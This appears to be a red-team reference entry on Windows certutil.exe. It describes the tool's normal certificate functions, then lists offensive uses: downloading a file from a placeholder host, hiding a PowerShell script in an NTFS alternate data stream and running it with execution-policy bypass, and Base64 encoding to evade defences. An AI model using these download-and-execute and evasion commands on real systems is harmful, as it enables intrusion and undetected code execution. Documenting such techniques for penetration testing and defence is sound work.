The goal of the CHDB project is to document every binary, script, and library that can be helpful for penetration testing (Red Team).
Certutil.exe is a command-line program, installed as part of Certificate Services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.
If certutil is run on a certification authority without additional parameters, it displays the current certification authority configuration. If certutil is run on a non-certification authority, the command defaults to running the certutil [-dump] command.
Earlier versions of certutil may not provide all of the options that are described in this document. You can see all the options that a specific version of certutil provides by running certutil -? or certutil -?.
Download From Certuil
certutil.exe -urlcache -split -f http://example.com/file_name file_name
Download file and save it in an NTFS Alternate Data Stream (ADS)
certutil.exe -urlcache -split -f http://example.com/file_name.ps1 c:temp:file_name
powershell -ep bypass - < c:temp:file_name
Encode (Base64) files to evade defensive measures
certutil -encode InputFileName EncodedOutputFileName
Decode (Base64) file
certutil -decode File_Encoded File_Decoded
Windows 7 windows 8 windows 10
certutil – dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.